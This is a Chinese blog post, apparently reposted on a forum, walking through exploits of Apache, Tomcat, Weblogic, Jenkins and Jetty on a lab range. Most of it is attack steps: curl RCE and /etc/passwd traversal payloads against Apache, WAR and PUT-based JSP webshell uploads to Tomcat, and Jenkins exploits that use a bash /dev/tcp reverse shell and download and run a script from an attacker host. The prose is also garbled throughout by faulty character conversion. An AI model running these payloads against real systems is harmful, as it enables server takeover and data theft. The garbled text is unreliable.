中心件安全(apache、tomcat)
靶场:vulfocus
Apache
Apache HTTP Server是美国阿帕奇(Apache)基金会的一款开源网页服务器。该服务用具有快速、可靠且可通过简朴的API进行扩充的特点,发现 Apache HTTP Server2.4.50 中针对 CVE-2021-41773 的修复不够充分。攻击者可以利用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。假如这些目录之外的文件不受通常的默认配置“要求全部拒绝”的掩护,则这些请求大概会乐成。假如还为这些别名路径启用了 CGI 脚本,则这大概答应长途代码实行。此题目仅影响 Apache2.4.49 和 Apache2.4.50,而不影响更早版本。 CVE-2021-42013(RCE)
利用:
方式一:
curl --data "echo;id" 'http://192.168.222.8:54778//cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'
id就是我们要实行的下令
https://i-blog.csdnimg.cn/blog_migrate/5c35357b13e97d03b53876ba483082c3.png 方式二:
直接以post方式提交数据包。数据就是要实行的下令。
POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh
https://i-blog.csdnimg.cn/blog_migrate/bf821922d42f2fb4558fd88b658f38af.png
通过实行下令我们也可以反弹shell。
CVE-2021-41773(目录穿越)
Apache HTTP Server 2.4.49、2.4.50版本对路径规范化所做的更改中存在一个路径穿越毛病,攻击者可利用该毛病读取到Web目录外的其他文件,如系统配置文件、网站源码等,甚至在特定情况下,攻击者可构造恶意请求实行下令,控礼服务器。
利用:
方式一:
curl - v -- path - as - is 'http://xx.xx.xx.xx/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' 读取etc.passwd文件
乐成读取/etc/passwd文件内容:https://i-blog.csdnimg.cn/blog_migrate/93c29a4ab2252f6ba8cc7a8cc47a5781.png
方式二:
利用BP直接发送数据包:
https://i-blog.csdnimg.cn/blog_migrate/4e5c879fb09cafe976eb95bceacd0d97.png
Tomcat
弱口令
https://i-blog.csdnimg.cn/blog_migrate/2d1a8f27b25916bc8f45ad9ca653d29d.png
这里有个后台管理功能,我们可以弱口令或者爆破进入后台。(默认:tomcat tomcat)
在后台有一个上传文件的功能。
https://i-blog.csdnimg.cn/blog_migrate/c3b469cd0ef3a421c0f98c1d8d051cc5.png
我们可以天生一个jsp后门代码(1.jsp),然后压缩成war文件(1.war)。
https://i-blog.csdnimg.cn/blog_migrate/5568f8202d53922d61e760f9ac81c059.png
CVE-2017-12615(文件上传)
Tomcat 是一个小型的轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍利用,是开辟和调试JSP 步调的首选。 攻击者将有大概可通过经心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 的webshell文件,JSP文件中的恶意代码将能被服务器实行,导致服务器上的数据泄露或获取服务器权限。
影响版本:Apache Tomcat 7.0.0 - 7.0.79
利用:
直接抓取数据包,然后以PUT形式提交数据包(数据包可以是一个后门代码)
https://i-blog.csdnimg.cn/blog_migrate/54dfdc55cc8996d8900d1bfae540dd64.png
发送该数据包之后就会创建一个1.jsp文件。
https://i-blog.csdnimg.cn/blog_migrate/07dc5b8767940d53d29f9c2439b9093c.png
CVE-2020-1938(文件包含)
ApacheTomcat AJP协议(默认8009端口)由于存在实现缺陷导致相干参数可控,攻击者利用该毛病可通过构造特定参数,读取服务器webapp目录下的任意文件。若服务器端同时存在文件上传功能,攻击者可进一步结合文件包含实现长途代码的实行。
毛病影响的产物版本包括:
Tomcat 6.*
Tomcat 7.* < 7.0.100
Tomcat 8.* < 8.5.51
Tomcat 9.* < 9.0.31
利用:
脚本:https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi python .\CNVD-2020-10487-Tomcat-Ajp-lfi.py 47.98.193.176 -p 35839 -f WEB-INF/web.xml
利用python2
Weblogic
默认端口:7001
假如我们发现目标地点利用weblogic,可以直接利用工具直接来检测是否存在毛病。
工具:https://github.com/KimJun1010/WeblogicTool 狐狸工具箱也有
https://i-blog.csdnimg.cn/blog_migrate/fa5d29fc6ed681e3b4c54bc8ce2cc385.png
jenkins
Jenkins是一个开源软件项目,是基于Java开辟的一种持续集成工具,用于监控持续重复的工作。 探针默认端口:8080 CVE-2017-1000353
Jenkins 可以通过其网页界面轻松设置和配置,其中包括即时错误查抄和内置资助。 插件 通过更新中心中的 1000 多个插件,Jenkins 集成了持续集成和持续交付工具链中几乎所有的工具。 Jenkins的反序列化毛病,攻击者利用该毛病可以在被攻击服务器实行任意代码,毛病利用不必要任何的权限。
利用:
[*]首先对待实行的反弹shell下令进行base64编码(bash -i >& /dev/tcp/x.x.x.x/端口 0>&1)
[*] java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "bash -c {echo,上面的base64编码值}|{base64,-d}|{bash,-i}" //在当前目录下天生一个jenkins_poc.ser文件,jdk利用1.8_291版本
[*] python exploit.py 目标地点 jenkins_poc.ser 在此之前记得攻击机nc接听端口
工具:http://github.com/vulhub/CVE-2017-1000353
CVE-2018-1000861
Jenkins 可以通过其网页界面轻松设置和配置,其中包括即时错误查抄和内置资助。 插件 通过更新中心中的 1000 多个插件,Jenkins 集成了持续集成和持续交付工具链中几乎所有的工具。 Jenkins 是常见的CI/CD服务器, 最常见的就是爆破弱口令然后利用groovy实行下令。
利用:
[*]首先在攻击机中创建一个文本文件(1.txt),在文件中写入反弹shell下令( bash -i >& /dev/tcp/x.x.x.x/端口 0>&1
)
[*] python3 -m http.server 8888 在该目录下利用python启动服务,长途可访问1.txt
[*] python2 exp.py http://目标地点/ "curl -o /tmp/1.sh http://x.x.x.x:8888/1.txt"
[*] python2 exp.py http://目标地点/ "bash /tmp/1.sh"
工具:https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc
jetty
Jetty是一个开源的servlet容器,它为基于Java的Web容器提供运行情况。
它的毛病就是敏感信息的泄露。我们可以访问下面的url
/%2e/WEB-INF/web.xml
/.%00/WEB-INF/web.xml
/%u002e/WEB-INF/web.xml
/static?/WEB-INF/web.xml
/a/b/..%00/WEB-INF/web.
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]